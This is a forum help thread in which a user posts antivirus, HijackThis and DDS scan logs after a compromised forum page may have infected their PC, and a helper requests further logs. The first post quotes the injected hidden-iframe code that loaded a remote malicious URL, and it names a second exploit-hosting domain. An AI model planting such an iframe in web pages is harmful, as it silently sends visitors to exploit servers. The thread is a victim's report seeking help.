Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Possible infection
Options
-
29-11-2009 9:34pmHi on Saturday morning I was browsing another forum when the site was attacked. The attack took the form of injecting code for an iframe into the forum pages. The code was:
</table> <!-- / forum rules & forum jump --> <iframe width=1 height=1 border=0 frameborder=0 src="http://centiyo.com/in.cgi?default"></iframe> <br /> <div class="smallfont" align="center">All times are GMT -5. The time now is <span class="time">10:12 PM</span>.</div> <br />
I was using Mozilla SeaMonkey to browse and on first visiting the site I noticed that the Java icon was loaded in my taskbar. This would not usually happen on this forum.
Many other users anti-virus programs reported a threat but mine, Microsoft Security Essentials, did not.
Avg reported:
File name: http://centiyo.com/in.cgi?default\{gzip}
Malware Name: HTML:RedirME-inf [Trj]
File Name: http://fuc*thecrisis.biz/lib/index.php
Threat Name: Exploit Javascript Obfuscation (type 714)
I'm now concerned that I may have picked up an infection. I ran MBAM and Super AntiSpyware and they came up clean but the Kapersky online scanner picked up an infection.
Also I found a file called yearsTend.class in the Java control panel Temporary Files. It came from http://fuc*thecrisis.biz/lib/yearsTend.class
Here are the log files of the scans I've done:
KASPERSKY ONLINE SCANNER 7.0: scan report
Sunday, November 29, 2009
Operating system: Microsoft Windows Vista Home Premium Edition, 32-bit Service Pack 2 (build 6002)
Kaspersky Online Scanner version: 7.0.26.13
Last database update: Sunday, November 29, 2009 02:01:28
Records in database: 3306136
Scan settings:
scan using the following database: extended
Scan archives: yes
Scan e-mail databases: yes
Scan area - My Computer:
C:\
\
E:\
F:\
G:\
H:\
I:\
Scan statistics:
Objects scanned: 189752
Threats found: 2
Infected objects found: 2
Suspicious objects found: 0
Scan duration: 01:50:36
File name / Threat / Threats count
C:\Users\Lennon\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20\60c48694-1ccd8d4f Infected: Trojan-Downloader.Java.Agent.ab 1
C:\Users\Lennon\Desktop\default\hnvp2lue.slt\Mail\Local Folders\College Inbox Infected: Email-Worm.Win32.Wallon.a 1
Selected area has been scanned.
Malwarebytes' Anti-Malware 1.41
Database version: 3258
Windows 6.0.6002 Service Pack 2
29/11/2009 20:08:50
mbam-log-2009-11-29 (20-08-50).txt
Scan type: Quick Scan
Objects scanned: 109216
Time elapsed: 3 minute(s), 29 second(s)
Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0
Memory Processes Infected:
(No malicious items detected)
Memory Modules Infected:
(No malicious items detected)
Registry Keys Infected:
(No malicious items detected)
Registry Values Infected:
(No malicious items detected)
Registry Data Items Infected:
(No malicious items detected)
Folders Infected:
(No malicious items detected)
Files Infected:
(No malicious items detected)
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:10:36, on 29/11/2009
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v8.00 (8.00.6001.18828)
Boot mode: Normal
Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files\Dell Support Center\bin\sprtcmd.exe
C:\Program Files\COMODO\Firewall\cfp.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Microsoft Security Essentials\msseces.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Windows\ehome\ehtray.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\SABnzbd\SABnzbd.exe
C:\Program Files\AutoHotkey\AutoHotkey.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Program Files\Mozilla Thunderbird\thunderbird.exe
C:\Program Files\SeaMonkey\seamonkey.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\system32\NOTEPAD.EXE
C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\SearchFilterHost.exe
C:\Users\Lennon\Desktop\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.ie/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer provided by Dell
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: Shareaza Web Download Hook - {0EEDB912-C5FA-486F-8334-57288578C627} - C:\Program Files\Shareaza\RazaWebHook32.dll
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Browser Address Error Redirector - {CA6319C0-31B7-401E-A518-A07C3DB8F777} - C:\Program Files\Dell\BAE\BAE.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [dscactivate] "C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe"
O4 - HKLM\..\Run: [DellSupportCenter] "C:\Program Files\Dell Support Center\bin\sprtcmd.exe" /P DellSupportCenter
O4 - HKLM\..\Run: [COMODO Firewall Pro] "C:\Program Files\COMODO\Firewall\cfp.exe" -h
O4 - HKLM\..\Run: [AppleSyncNotifier] C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [COMODO Internet Security] "C:\Program Files\COMODO\Firewall\cfp.exe" -h
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [MSSE] "c:\Program Files\Microsoft Security Essentials\msseces.exe" -hide
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKCU\..\Run: [DellSupportCenter] "C:\Program Files\Dell Support Center\bin\sprtcmd.exe" /P DellSupportCenter
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKCU\..\Run: [Google Update] "C:\Users\Lennon\AppData\Local\Google\Update\GoogleUpdate.exe" /c
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-21-1411996874-1301283773-3185572280-1003\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'postgres')
O4 - Global Startup: SABnzbd.lnk = C:\Program Files\SABnzbd\SABnzbd.exe
O4 - Global Startup: WindowPad.ahk.lnk = C:\AHK\WindowPad\WindowPad.ahk
O8 - Extra context menu item: Download with &Shareaza - res://C:\Program Files\Shareaza\RazaWebHook32.dll/3000
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Titan Poker - {49783ED4-258D-4f9f-BE11-137C18D3E543} - C:\Poker\Titan Poker\casino.exe
O9 - Extra 'Tools' menuitem: Titan Poker - {49783ED4-258D-4f9f-BE11-137C18D3E543} - C:\Poker\Titan Poker\casino.exe
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\OFFICE11\REFIEBAR.DLL
O9 - Extra button: CDPoker - {A68FC757-51CF-4f3c-B13A-BFB8CA69BB99} - C:\Poker\CDPoker\casino.exe
O9 - Extra 'Tools' menuitem: CDPoker - {A68FC757-51CF-4f3c-B13A-BFB8CA69BB99} - C:\Poker\CDPoker\casino.exe
O9 - Extra button: Gnuf Poker - {A99C8F70-4D5B-482c-8854-05BC0BB8B182} - C:\Gnuf\Poker\MPPoker.exe
O9 - Extra button: Noble Poker - {B723B1B8-9788-4684-ADA7-D1DB02E1D516} - C:\Poker\Noble Poker\casino.exe
O9 - Extra 'Tools' menuitem: Noble Poker - {B723B1B8-9788-4684-ADA7-D1DB02E1D516} - C:\Poker\Noble Poker\casino.exe
O9 - Extra button: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - C:\Programs\PartyGaming\PartyPoker\RunApp.exe
O9 - Extra 'Tools' menuitem: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - C:\Programs\PartyGaming\PartyPoker\RunApp.exe
O9 - Extra button: Purple Lounge - {00000000-0000-0000-0000-000000000000} - C:\MicroGaming\Poker\PurpleLoungeMPP\MPPoker.exe (HKCU)
O9 - Extra button: CarbonPoker - {e4e8c758-34b4-44bb-8ef9-1f0786e81d2d} - C:\Users\Lennon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CarbonPoker\CarbonPoker.lnk (file missing) (HKCU)
O13 - Gopher Prefix:
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - http://download.eset.com/special/eos/OnlineScanner.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O16 - DPF: {D8089245-3211-40F6-819B-9E5E92CD61A2} (FlashXControl Object) - https://mppv2flash3.valueactive.com/PokerShare/FlashAX.cab
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{019BBC51-493A-48CD-8901-399505DA1F8B}: NameServer = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
O17 - HKLM\System\CS1\Services\Tcpip\..\{019BBC51-493A-48CD-8901-399505DA1F8B}: NameServer = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
O17 - HKLM\System\CS2\Services\Tcpip\..\{019BBC51-493A-48CD-8901-399505DA1F8B}: NameServer = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
O20 - AppInit_DLLs: C:\Windows\system32\guard32.dll
O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O23 - Service: Andrea RT Filters Service (AERTFilters) - Andrea Electronics Corporation - C:\Windows\system32\AERTSrv.exe
O23 - Service: AMD External Events Utility - AMD - C:\Windows\system32\atiesrxx.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: COMODO Internet Security Helper Service (cmdAgent) - COMODO - C:\Program Files\COMODO\Firewall\cmdagent.exe
O23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exe
O23 - Service: Google Update Service (gupdate1c9e852b942f080) (gupdate1c9e852b942f080) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: PostgreSQL Server 8.3 (postgresql-8.3) - PostgreSQL Global Development Group - C:/Program Files/PostgreSQL/8.3/bin/pg_ctl.exe
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies, Inc. - C:\Program Files\WinPcap\rpcapd.exe
O23 - Service: SupportSoft Sprocket Service (dellsupportcenter) (sprtsvc_dellsupportcenter) - SupportSoft, Inc. - C:\Program Files\Dell Support Center\bin\sprtsvc.exe
O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe
O23 - Service: TVersityMediaServer - Unknown owner - C:\Users\Lennon\AppData\Local\TVersity\Media Server\MediaServer.exe
--
End of file - 9277 bytes
Rooter.exe (v1.0.2) by Eric_71
.
SeDebugPrivilege granted successfully ...
.
Windows Vista Home Edition (6.0.6002) Service Pack 2
[32_bits] - x86 Family 6 Model 15 Stepping 11, GenuineIntel
.
[wscsvc] (Security Center) RUNNING (state:4)
[MpsSvc] RUNNING (state:4)
Windows Firewall -> Disabled !
Windows Defender -> Disabled !
User Account Control (UAC) -> Disabled !
.
Internet Explorer 8.0.6001.18828
Mozilla Firefox 3.5.5 (en-GB)
.
C:\ [Fixed-NTFS] .. ( Total:239 Go - Free:92 Go )
\ [Fixed-NTFS] .. ( Total:9 Go - Free:5 Go )
E:\ [CD_Rom]
F:\ [Removable]
G:\ [Removable]
H:\ [Removable]
I:\ [Removable]
.
Scan : 20:11.25
Path : C:\Users\Lennon\Desktop\Rooter.exe
User : Lennon ( Administrator -> YES )
.
\\ Processes
.
Locked [System Process] (0)
Locked System (4)
______ \SystemRoot\System32\smss.exe (536)
______ C:\Windows\system32\csrss.exe (604)
______ C:\Windows\system32\wininit.exe (668)
______ C:\Windows\system32\csrss.exe (680)
______ C:\Windows\system32\services.exe (712)
______ C:\Windows\system32\lsass.exe (724)
______ C:\Windows\system32\lsm.exe (732)
______ C:\Windows\system32\svchost.exe (884)
______ C:\Windows\system32\winlogon.exe (896)
______ C:\Windows\system32\svchost.exe (968)
______ C:\Program Files\COMODO\Firewall\cmdagent.exe (1008)
______ C:\Windows\system32\svchost.exe (1056)
______ c:\Program Files\Microsoft Security Essentials\MsMpEng.exe (1076)
______ C:\Windows\system32\atiesrxx.exe (1280)
______ C:\Windows\System32\svchost.exe (1328)
______ C:\Windows\System32\svchost.exe (1372)
______ C:\Windows\system32\svchost.exe (1384)
Locked audiodg.exe (1476)
______ C:\Windows\system32\svchost.exe (1500)
______ C:\Windows\system32\SLsvc.exe (1520)
______ C:\Windows\system32\svchost.exe (1548)
______ C:\Windows\system32\atieclxx.exe (1704)
______ C:\Windows\System32\spoolsv.exe (1964)
______ C:\Windows\system32\svchost.exe (1996)
______ C:\Windows\system32\taskeng.exe (1316)
______ C:\Windows\system32\Dwm.exe (1720)
______ C:\Windows\Explorer.EXE (352)
______ C:\Windows\system32\taskeng.exe (2084)
______ C:\Program Files\Google\Update\1.2.183.13\GoogleCrashHandler.exe (2192)
______ C:\Program Files\Dell Support Center\bin\sprtcmd.exe (2336)
______ C:\Program Files\COMODO\Firewall\cfp.exe (2344)
______ C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe (2448)
______ C:\Windows\RtHDVCpl.exe (2524)
______ C:\Program Files\Microsoft Security Essentials\msseces.exe (2612)
______ C:\Program Files\iTunes\iTunesHelper.exe (2624)
______ C:\Program Files\Java\jre6\bin\jusched.exe (2632)
______ C:\Windows\ehome\ehtray.exe (2648)
______ C:\Windows\system32\AERTSrv.exe (2828)
______ C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe (2840)
______ C:\Program Files\Bonjour\mDNSResponder.exe (2852)
______ C:\Windows\ehome\ehmsas.exe (3216)
______ C:\Program Files\SABnzbd\SABnzbd.exe (3228)
______ C:\Program Files\AutoHotkey\AutoHotkey.exe (3244)
______ C:\Windows\System32\svchost.exe (3360)
______ C:\Windows\system32\svchost.exe (3372)
______ C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe (3656)
______ C:\Program Files\PostgreSQL\8.3\bin\pg_ctl.exe (3784)
______ C:\Program Files\Dell Support Center\bin\sprtsvc.exe (3800)
______ C:\Windows\system32\svchost.exe (3816)
______ C:\Windows\System32\svchost.exe (3892)
______ C:\Windows\system32\SearchIndexer.exe (3912)
______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (4072)
______ C:\Windows\system32\WUDFHost.exe (2532)
______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (2792)
______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (1556)
______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (2992)
______ C:\Program Files\PostgreSQL\8.3\bin\postgres.exe (3076)
______ C:\Program Files\iPod\bin\iPodService.exe (3432)
______ C:\Windows\system32\SearchProtocolHost.exe (1464)
______ C:\Program Files\Mozilla Thunderbird\thunderbird.exe (5376)
______ C:\Program Files\SeaMonkey\seamonkey.exe (4708)
______ C:\Program Files\Mozilla Firefox\firefox.exe (6056)
______ C:\Windows\system32\NOTEPAD.EXE (1664)
______ C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe (5120)
______ C:\Windows\system32\NOTEPAD.EXE (4836)
______ C:\Windows\system32\SearchFilterHost.exe (4796)
______ C:\Users\Lennon\Desktop\HijackThis.exe (2996)
______ C:\Windows\system32\wbem\wmiprvse.exe (5476)
______ C:\Windows\system32\NOTEPAD.EXE (1204)
______ C:\Users\Lennon\Desktop\Rooter.exe (1092)
.
\\ Device\Harddisk0\
.
\Device\Harddisk0 [Sectors : 63 x 512 Bytes]
.
\Device\Harddisk0\Partition1 (Start_Offset:32256 | Length:73995264)
\Device\Harddisk0\Partition2 (Start_Offset:74448896 | Length:10737418240)
\Device\Harddisk0\Partition3 --[ MBR ]-- (Start_Offset:10811867136 | Length:256830865408)
\Device\Harddisk0\Partition0 (Start_Offset:267642732544 | Length:52428800000)
\Device\Harddisk0\Partition4 (Start_Offset:267643781120 | Length:52427751424)
.
\\ Scheduled Tasks
.
C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1411996874-1301283773-3185572280-1001Core.job
C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1411996874-1301283773-3185572280-1001UA.job
C:\Windows\Tasks\SA.DAT
C:\Windows\Tasks\SCHEDLGU.TXT
.
\\ Registry
.
.
\\ Files & Folders
.
\\ Scan completed at 20:11.39
.
C:\Rooter$\Rooter_1.txt - (29/11/2009 | 20:11.39)
I would be grateful if someone could tell me if these look ok. Thanks in advance.0
Comments
-
looks ok
Please download DDS and save it to your desktop.- Disable any script blocking protection
- Double click dds.pif to run the tool.
- When done, two DDS.txts will open.
- Save both reports to your desktop.
Please include the contents of the following in your next reply:
DDS.txt
Attach.txt.0 -
Thanks very much for the quick response. Here are the requested files:
DDS (Ver_09-11-29.01) - NTFSx86
Run by Lennon at 0:10:26.94 on 30/11/2009
Internet Explorer: 8.0.6001.18828 BrowserJavaVersion: 1.6.0_17
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.353.1033.18.3069.1420 [GMT 0:00]
SP: COMODO Defense+ *enabled* (Updated) {043803A4-4F86-4ef7-AFC5-F6E02A79969B}
SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}
SP: SUPERAntiSpyware *disabled* (Updated) {222A897C-5018-402e-943F-7E7AC8560DA7}
FW: COMODO Firewall *enabled* {043803A3-4F86-4ef6-AFC5-F6E02A79969B}
============== Running Processes ===============
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Program Files\COMODO\Firewall\cmdagent.exe
C:\Windows\system32\svchost.exe -k NetworkService
c:\Program Files\Microsoft Security Essentials\MsMpEng.exe
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\atieclxx.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files\Google\Update\1.2.183.13\GoogleCrashHandler.exe
C:\Program Files\COMODO\Firewall\cfp.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Microsoft Security Essentials\msseces.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Windows\ehome\ehtray.exe
C:\Windows\system32\AERTSrv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\SABnzbd\SABnzbd.exe
C:\Program Files\AutoHotkey\AutoHotkey.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Program Files\PostgreSQL\8.3\bin\pg_ctl.exe
C:\Program Files\Dell Support Center\bin\sprtsvc.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
C:\Windows\system32\WUDFHost.exe
C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
C:\Program Files\PostgreSQL\8.3\bin\postgres.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\SeaMonkey\seamonkey.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
c:\Program Files\Microsoft Security Essentials\MpCmdRun.exe
C:\Users\Lennon\Desktop\dds.pif
C:\Windows\system32\conime.exe
C:\Windows\system32\wbem\wmiprvse.exe
============== Pseudo HJT Report ===============
uStart Page = hxxp://www.google.ie/
uWindow Title = Internet Explorer provided by Dell
uInternet Settings,ProxyOverride = *.local
BHO: Shareaza Web Download Hook: {0eedb912-c5fa-486f-8334-57288578c627} - c:\program files\shareaza\RazaWebHook32.dll
BHO: {5C255C8A-E604-49b4-9D64-90988571CECB} - No File
BHO: Windows Live Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: CBrowserHelperObject Object: {ca6319c0-31b7-401e-a518-a07c3db8f777} - c:\program files\dell\bae\BAE.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
uRun: [DellSupportCenter] "c:\program files\dell support center\bin\sprtcmd.exe" /P DellSupportCenter
uRun: [ehTray.exe] c:\windows\ehome\ehTray.exe
uRun: [Google Update] "c:\users\lennon\appdata\local\google\update\GoogleUpdate.exe" /c
mRun: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
mRun: [StartCCC] "c:\program files\ati technologies\ati.ace\core-static\CLIStart.exe" MSRun
mRun: [dscactivate] "c:\program files\dell support center\gs_agent\custom\dsca.exe"
mRun: [DellSupportCenter] "c:\program files\dell support center\bin\sprtcmd.exe" /P DellSupportCenter
mRun: [COMODO Firewall Pro] "c:\program files\comodo\firewall\cfp.exe" -h
mRun: [AppleSyncNotifier] c:\program files\common files\apple\mobile device support\bin\AppleSyncNotifier.exe
mRun: [RtHDVCpl] RtHDVCpl.exe
mRun: [COMODO Internet Security] "c:\program files\comodo\firewall\cfp.exe" -h
mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
mRun: [MSSE] "c:\program files\microsoft security essentials\msseces.exe" -hide
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
mRun: [SunJavaUpdateSched] "c:\program files\java\jre6\bin\jusched.exe"
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\sabnzbd.lnk - c:\program files\sabnzbd\SABnzbd.exe
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\window~1.lnk - c:\ahk\windowpad\WindowPad.ahk
mPolicies-explorer: BindDirectlyToPropertySetStorage = 0 (0x0)
mPolicies-system: EnableLUA = 0 (0x0)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
IE: Download with &Shareaza - c:\program files\shareaza\RazaWebHook32.dll/3000
IE: E&xport to Microsoft Excel - c:\progra~1\micros~3\office11\EXCEL.EXE/3000
IE: {49783ED4-258D-4f9f-BE11-137C18D3E543} - c:\poker\titan poker\casino.exe
IE: {A68FC757-51CF-4f3c-B13A-BFB8CA69BB99} - c:\poker\cdpoker\casino.exe
IE: {A99C8F70-4D5B-482c-8854-05BC0BB8B182} - c:\gnuf\poker\MPPoker.exe
IE: {B723B1B8-9788-4684-ADA7-D1DB02E1D516} - c:\poker\noble poker\casino.exe
IE: {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - c:\programs\partygaming\partypoker\RunApp.exe
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503} - c:\progra~1\micros~3\office11\REFIEBAR.DLL
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} - hxxp://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab
DPF: {CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: {D8089245-3211-40F6-819B-9E5E92CD61A2} - hxxps://mppv2flash3.valueactive.com/PokerShare/FlashAX.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
TCP: {019BBC51-493A-48CD-8901-399505DA1F8B} = 62.231.32.10,62.231.32.11,4.2.2.1,4.2.2.2
Notify: !SASWinLogon - c:\program files\superantispyware\SASWINLO.dll
AppInit_DLLs: c:\windows\system32\guard32.dll
SEH: SABShellExecuteHook Class: {5ae067d3-9afb-48e0-853a-ebb7f4a000da} - c:\program files\superantispyware\SASSEH.DLL
================= FIREFOX ===================
FF - ProfilePath - c:\users\lennon\appdata\roaming\mozilla\firefox\profiles\bigxufq1.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.google.ie/
FF - plugin: c:\program files\google\google earth\plugin\npgeplugin.dll
FF - plugin: c:\program files\google\update\1.2.145.5\npGoogleOneClick8.dll
FF - plugin: c:\program files\google\update\1.2.183.13\npGoogleOneClick8.dll
FF - plugin: c:\program files\google\update\1.2.183.7\npGoogleOneClick8.dll
FF - plugin: c:\program files\mozilla firefox\plugins\npFoxitReaderPlugin.dll
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\NPOFFICE.DLL
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin.dll
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin2.dll
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin3.dll
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin4.dll
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin5.dll
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin6.dll
FF - plugin: c:\program files\opera 9.5 beta\program\plugins\npqtplugin7.dll
FF - plugin: c:\program files\opera\program\plugins\np_gp.dll
